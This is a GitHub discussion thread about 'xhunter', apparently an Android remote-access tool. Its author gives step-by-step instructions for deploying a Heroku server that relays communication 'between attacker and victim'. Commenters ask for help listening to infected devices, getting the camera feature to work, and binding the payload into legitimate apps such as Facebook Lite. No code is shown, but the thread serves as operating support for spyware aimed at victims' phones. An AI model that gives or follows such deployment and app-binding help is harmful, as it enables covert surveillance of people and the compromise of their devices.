### DISCUSSION TITLE
xhunter custom server deployment on heroku

### DISCUSSION THREAD

**Discussion by anirudhmalik** [anirudhmalik/xhunter#23] [Ideas]
I am building a [xhunter-custom-server](https://github.com/anirudhmalik/xhunter/tree/anirudh/server) that can be deployed on [heroku](https://www.heroku.com/) and can be used to comunicate between attacker and victim. It will solve ssh reverse tunneling server and localtunnel server. I will create heroku deploy button that will be easy to setup for those were facing seting up ssh server.

**Comment by ghost** [comment]
Good

**Comment by EJ3CT** [comment]
> I am building a [xhunter-custom-server](https://github.com/anirudhmalik/xhunter/tree/anirudh/server) that can be deployed on [heroku](https://www.heroku.com/) and can be used to comunicate between attacker and victim. It will solve ssh reverse tunneling server and localtunnel server. I will create heroku deploy button that will be easy to setup for those were facing seting up ssh server. 

love it

**Reply by Clintonlelop** [reply]
Please when are you doing it?

**Comment by anirudhmalik** [comment]
# xhunter-server

xhunter-server is used to communicate between attacker and victim. It is very easy to host on [heroku](https://www.heroku.com/). follow the below steps:

#### Setup
- Signup and create a heroku account [here](https://signup.heroku.com)
- After login, click the below **Deploy** button.

   [![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy?template=https://github.com/anirudhmalik/xhunter-server)
 
 - Give your app a name `<your_app_name>` and click `Deploy app` button.
 - Wait for the process to complete. 
 - Once complete, Click `view app` and If you see `Welcome to Xhunter Backend Server!!` then you have successfully created your server.
 - Now use this url `https://<your_app_name>.herokuapp.com` in [xhunter_v1.5.apk](https://github.com/anirudhmalik/xhunter/releases/tag/v1.5).

**Reply by lulavc** [reply]
The app name on heroku must be the exact name of the apk name?

Here is not working

**Reply by anirudhmalik** [reply]
> The app name on heroku must be the exact name of the apk name?
> 
> Here is not working 

no, you can have what ever you want.

**Reply by lulavc** [reply]
Tried 2 times but failed to monitor.
Edit: Worked. But any app i try to use instead of default gives error.

**Comment by Storm8lack** [comment]
Hi, friend!!!  I already created the heroku server, also the payload, but when listening the server does not start.  Is it time to put username, password and the address of the created server?

**Comment by anirudhmalik** [comment]
I have updated the release. by mistake v1.4 was uploaded please update it to v1.5 and simply use the address/url to connect.

**Reply by EJ3CT** [reply]
no problem brother

**Comment by 1010hh** [comment]
I can not use Heroku ...Is there some thing else ?

**Comment by ahanaujam** [comment]
Hello, application isn't binding. What kind of application does it accept?

**Reply by danuartax64** [reply]
may i know what app you trying to binding before?

**Reply by ahanaujam** [reply]
Facebook lite app

**Reply by ahanaujam** [reply]
Which app can I bind easily

**Comment by EGHackers** [comment]
I cant sing up in heroku

What is worng

**Comment by Venom3010538** [comment]
Bhaiyya camera feature Listner pe nahi aa raha hai. Also koi bhi apk bind karne ki koshish karo badi ya chhoti fail ho jata hai? Any solutions? Please help. Aapka app bohot achha hai btw

**Comment by anirudhmalik** [comment]
Closing in favor of v2. See [v2.0-demo](https://github.com/anirudhmalik/xhunter/releases/tag/v2.0-demo) and the repo README. New bugs: open a fresh issue with repro steps. Thanks.
